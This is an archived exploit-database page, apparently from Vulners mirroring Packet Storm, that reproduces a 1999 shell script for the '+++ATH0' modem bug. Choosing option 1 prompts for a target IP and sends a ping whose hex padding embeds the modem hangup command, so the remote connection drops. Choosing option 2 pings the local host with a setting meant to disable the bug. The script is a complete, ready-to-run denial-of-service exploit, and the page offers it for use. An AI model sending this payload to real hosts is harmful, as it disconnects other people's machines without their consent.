Lucene search
K

ath0-2.sh

🗓️ 17 Aug 1999 00:00:00Reported by Nelson R A BritoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Script for patching and exploiting the +++ATH0 vulnerability, with options to exploit or patch.

Code
`# Script para utilizar como pacth e como exploit para o problema do +++ATH0  
# +++ath0.sh - By Nelson R A Brito <[email protected]> - 01/01/99   
# [http://www.angelfire.com/sd/stderr]  
#!/usr/bin/bash  
clear  
echo " +++ATH0 PATCH and EXPLOIT - By Nelson R A Brito"  
echo " <[email protected]>"  
echo " "  
echo "Choose (1) to exploit or (2) to patch !"  
read ANS1  
if test $ANS1  
then  
if test $ANS1 = 1  
then   
echo "Give me the dst_ip."  
read ANS2  
exec ping -p 2b2b2b415448300d $ANS2  
elif test $ANS1 = 2  
then  
echo "Clean +++ATH0's bug in your own machine."  
exec ping -p 2b2b2b415453323d32353526574f310d $HOSTNAME  
fi  
fi  
echo "Fuck you dumbass, choose (1) or (2) next time. :>"  
exit 1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
25